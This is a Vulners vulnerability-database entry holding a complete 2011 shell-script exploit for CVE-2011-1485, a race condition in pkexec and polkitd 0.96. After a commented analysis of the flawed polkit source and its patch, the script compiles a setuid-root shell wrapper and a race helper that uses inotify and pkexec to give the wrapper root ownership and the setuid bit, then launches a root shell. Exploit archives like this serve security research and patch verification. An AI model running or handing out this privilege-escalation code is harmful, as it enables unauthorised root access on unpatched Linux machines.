Vulners
Lucene search
Linux pkexec / polkitd 0.96 Race Condition
| Reporter | Title | Published | Views | Family All 74 |
|---|---|---|---|---|
 | PolicyKit Pwnage: linux local privilege escalation on polkit-1 <= 0.101 | 4 Oct 201100:00 | – | zdt |
| pkexec Race Condition Privilege Escalation Exploit | 7 Oct 201100:00 | – | zdt |
| Linux PolicyKit Race Condition Privilege Escalation Exploit | 18 Oct 201400:00 | – | zdt |
 | Security fix for the ALT Linux 9 package polkit version 0.101-alt2 | 25 Apr 201100:00 | – | altlinux |
| Security fix for the ALT Linux 6 package polkit version 0.101-alt2 | 25 Apr 201100:00 | – | altlinux |
 | CVE-2011-1485 | 20 Oct 201400:00 | – | circl |
 | CVE-2011-1485 | 31 May 201120:00 | – | cve |
 | CVE-2011-1485 | 31 May 201120:00 | – | cvelist |
 | Immunity Canvas: CVE_2011_1485 | 31 May 201120:55 | – | canvas |
 | [SECURITY] [DSA 2319-1] policykit-1 security update | 8 Oct 201113:08 | – | debian |
10
`#!/bin/sh
<<COMMENT1
Exploit Title: Linux pkexec and polkitd 0.96 race condition privilege escalation
Date: Sun Oct 9 00:31:10 WIT 2011
Author: Ev1lut10n
About Ev1lut10n:
http://jasaplus.com/ev1lut10n
A Chinese Man Lives in Indonesia
Software Link: http://pkgs.fedoraproject.org/repo/pkgs/polkit/polkit-0.96.tar.gz/e0a06da501b04ed3bab986a9df5b5aa2/
Version: 0.96
Tested on: 2.6.35-22-generic #33-Ubuntu SMP Sun Sep 19 20:34:50 UTC 2010 i686 GNU/Linux under Gnome Environment
CVE : CVE-2011-1485
Brief Descriptions
src/polkit/polkitunixprocess.c where it fails to clarify the real uid, under this race condition it will return the effective one.
on : polkit_unix_process_get_owner (PolkitUnixProcess *process,
g_snprintf (procbuf, sizeof procbuf, "/proc/%d", process->pid);
if (stat (procbuf, &statbuf) != 0)
{
g_set_error (error,
POLKIT_ERROR,
POLKIT_ERROR_FAILED,
"stat() failed for /proc/%d: %s",
process->pid,
g_strerror (errno));
goto out;
}
where the code only rely on stat of the pseudo filesystem
src/polkit/polkitsubject.c ---------> there's not enough validation to run polkit_unix_process_new
on polkit_subject_from_string (const gchar *str,
there's no enough validation before launching polkit_unix_process_new
if (g_str_has_prefix (str, "unix-process:"))
{
val = g_ascii_strtoull (str + sizeof "unix-process:" - 1,
&endptr,
10);
if (*endptr == '\0')
{
subject = polkit_unix_process_new ((gint) val);
the fix is to add more validations (polkit_unix_process_new_for_owner,polkit_unix_process_new_full,polkit_unix_process_new_full):
if (sscanf (str, "unix-process:%d:%" G_GUINT64_FORMAT ":%d", &scanned_pid, &scanned_starttime, &scanned_uid) == 3)
{
+ subject = polkit_unix_process_new_for_owner (scanned_pid, scanned_starttime, scanned_uid);
+ }
+ else if (sscanf (str, "unix-process:%d:%" G_GUINT64_FORMAT, &scanned_pid, &scanned_starttime) == 2)
+ {
+ subject = polkit_unix_process_new_full (scanned_pid, scanned_starttime);
+ }
+ else if (sscanf (str, "unix-process:%d", &scanned_pid) == 1)
+ {
+ subject = polkit_unix_process
src/polkitbackend/polkitbackendsessionmonitor.c
function polkit_backend_session_monitor_get_user_for_subject (PolkitBackendSessionMonitor
if (POLKIT_IS_UNIX_PROCESS (subject))
{
GError *local_error;
local_error = NULL;
uid = polkit_unix_process_get_owner (POLKIT_UNIX_PROCESS (subject), &local_error);
as we may see from above code : "polkit_unix_process_get_owner" will not avoid "Time of Check to Time of Use Problem"
http://www.usenix.org/events/fast05/tech/full_papers/wei/wei.pdf
src/programs/pkexec.c
pkexec doesn't use the uid of parent process had and will still continue when the parent die :
pid_of_caller = getppid ();
if (pid_of_caller == 1)
{
pid_of_caller = getpgrp ();
}
subject = polkit_unix_process_new (pid_of_caller);
where it will continue even if the parent is dead.
where the patch has been applied by adding prctl to check the death signal of the parent process (PR_SET_PDEATHSIG):
if (prctl (PR_SET_PDEATHSIG, SIGTERM) != 0)
+ {
+ g_printerr ("prctl(PR_SET_PDEATHSIG, SIGTERM) failed: %s\n", g_strerror (errno)); /**So if our parent die goto out***/
+ goto out;
+ }
COMMENT1
cat > suid.c << _EOF
#include <stdio.h>
#include <string.h>
int main(int argc,char *argv[])
{
char *root=malloc(1000);
char perintah[256]="/bin/sh -c ";
int i;
char *spasi=" ";
strcat(root,perintah);
for (i=1;i<argc;i++)
{
strcat(root,argv[i]);
strcat(root,spasi);
}
setuid(0);
setgid(0);
system(root);
}
_EOF
cat > makesuid.c << _EOF
/**this code was modified from http://www.exploit-db.com/exploits/17932/ by zx2c **/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>
int main(int argc, char **argv)
{
if (fork() != 0)
{
int fd;
char pid_path[15];
sprintf(pid_path, "/proc/%i", getpid());
close(0); close(1); close(2);
fd = inotify_init();
inotify_add_watch(fd, pid_path, IN_ACCESS);
read(fd, NULL, 0);
execl("/usr/bin/X", "X", NULL);
}
else
{
execl("/usr/bin/pkexec", "pkexec", argv[1],argv[2],argv[3], NULL);
}
return 0;
}
_EOF
gcc -o /tmp/suid suid.c
gcc -o makesuid makesuid.c
./makesuid chown root:root /tmp/suid
./makesuid chmod u+s /tmp/suid
echo "your suid is on /tmp/suid make sure u move this !!!"
/tmp/./suid -c /bin/sh
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Oct 2011 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.05537